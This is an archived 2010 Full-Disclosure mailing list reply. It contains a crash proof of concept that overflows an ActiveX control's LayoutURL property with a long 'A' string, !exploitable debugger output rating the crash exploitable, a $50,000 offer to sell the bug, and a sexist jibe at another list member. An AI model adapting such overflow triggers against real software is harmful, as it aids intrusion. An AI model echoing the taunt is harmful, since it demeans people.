lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <AANLkTinjqxHhzvidUHK11IvAeks66rywoOfnVbdRXRBb@mail.gmail.com>
Date: Thu, 10 Jun 2010 12:39:20 -0400
From: musnt live <musntlive@...il.com>
To: Susan Bradley <sbradcpa@...bell.net>
Cc: full-disclosure@...ts.grok.org.uk, Tavis Ormandy <taviso@...xchg8b.com>,
	bugtraq@...urityfocus.com
Subject: Re: Microsoft Windows Help Centre Handles
	Malformed Escape Sequences Incorrectly

On Thu, Jun 10, 2010 at 12:18 PM, Susan Bradley <sbradcpa@...bell.net>wrote:

> Nope Mr. Live, other than dealing with .NET updates and a 982331 that keeps
> wanting to have UAC turned off on some Win7/Vistas to get installed, this is
> just my normal calm, try to also consider the consumers and patchers
> viewpoint person today.
>
> musnt live wrote:
>
>
>> On Thu, Jun 10, 2010 at 11:36 AM, Susan Bradley <sbradcpa@...bell.net<mailto:
>> sbradcpa@...bell.net>> wrote:
>>
>>    I'm not an enterprise customer, but I am a mouthy female.
>>
>>
>> Hello Full Disclosure, I'd like to warn you about PMS!
>>
>

Hello Full Disclosure, please forgive for me my premature mail. What is I
meant to now say is, I would like to warn you about Denial:

http://en.wikipedia.org/wiki/Denial

Denial is a defense mechanism postulated by Sigmund Freud, in which a person
is faced with a fact that is too uncomfortable to accept and rejects it
instead, insisting that it is not true despite what may be overwhelming
evidence.

I once had denial from vulnerable company I will release in the future:

targetFile = "C:\NOFREEBUGNAMES.ocx"
prototype  = "Invoke_Unknown LayoutURL As String"
memberName = "LayoutURL"
progid     = "no.free.bugs"
argCount   = 1

arg1=String(4116, "A")

target.LayoutURL = arg1


0:000> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0xffffffffdeadbabe
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Faulting Instruction:XXXXXXXX call dword ptr [ecx]

Exception Hash (Major/Minor): 0x237f6e51.0x456c465d

Stack Trace:
nomore!CBaseBSCB::KickOffDownload+0x82
nomore!URLOpenStreamW+0x41
nomore!URLOpenStreamA+0x94
freebugs!DllUnregisterServer+0x5974
freebugs!BufferComparator::operator=+0x497a
freebugs!msgi_lookup+0x46e61
freebugs!msgi_lookup+0x4f705
vbscript!IDispatchInvoke2+0xb2
vbscript!IDispatchInvoke+0x59
vbscript!InvokeDispatch+0x13c
vbscript!InvokeByName+0x43
vbscript!CScriptRuntime::RunNoEH+0x1158
vbscript!CScriptRuntime::Run+0x64
vbscript!CScriptEntryPoint::Call+0x51
vbscript!CSession::Execute+0xc8
vbscript!COleScript::ExecutePendingScripts+0x146
vbscript!COleScript::SetScriptState+0x14d
scrobj!ScriptEngine::Activate+0x1a
scrobj!ComScriptlet::Inner::StartEngines+0x6e
scrobj!ComScriptlet::Inner::Init+0x156
scrobj!ComScriptlet::New+0x3f
scrobj!ComScriptletConstructor::CreateScriptletFromNode+0x26
scrobj!ComScriptletConstructor::Create+0x4c
wscript!CHost::RunXMLScript+0x277
wscript!CHost::Execute+0x1cb
wscript!CHost::Main+0x38b
wscript!StringCchPrintfA+0xc3f
wscript!WinMain+0x18b
wscript!WinMainCRTStartup+0x5d
kernel32!BaseThreadInitThunk+0xe
ntdll!__RtlUserThreadStart+0x70
ntdll!_RtlUserThreadStart+0x1b
Instruction Address: 0x00000000XXXXXXXX

Description: Read Access Violation on Control Flow
Short Description: ReadAVonControlFlow
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation on Control Flow
starting at nomore!CBaseBSCB::KickOffDownload+0x0000000000000082
(Hash=0x237f6e51.0x456c465d)

This bug too exploitable is as is my engrish. Starting bid affects all
Windows versions and server remotely. Starting bid $50,000.00

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ